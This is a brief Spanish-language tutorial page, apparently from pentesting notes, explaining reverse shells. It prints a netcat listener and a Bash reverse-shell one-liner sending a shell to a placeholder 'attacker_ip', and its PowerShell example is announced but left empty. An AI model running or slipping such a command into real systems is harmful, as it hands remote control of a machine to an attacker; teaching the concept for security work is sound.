¿Reverse Shell?

Una reverse shell es un tipo de shell donde el flujo de comunicación se invierte. En lugar de que el atacante se conecte directamente a la máquina objetivo, la máquina objetivo establece una conexión de vuelta al atacante. Esto puede ayudar a evadir firewalls y otras medidas de seguridad que bloquean conexiones entrantes.

https://www.revshells.com/

Funcionamiento de una Reverse Shell

  1. Atacante: Inicia un listener en su máquina para esperar conexiones entrantes.

  2. Víctima: Ejecuta un payload que abre una conexión hacia la máquina del atacante.

  3. Control Remoto: Una vez establecida la conexión, el atacante puede enviar comandos y controlar el sistema de la víctima.

Ejemplo de Reverse Shell en Bash (Linux):

Atacante:

nc -lvnp 4444

Víctima:

bash -i >& /dev/tcp/attacker_ip/4444 0>&1

Ejemplo de Reverse Shell en PowerShell (Windows):

Atacante:

nc -lvnp 4444

Víctima:

Última actualización

¿Te fue útil?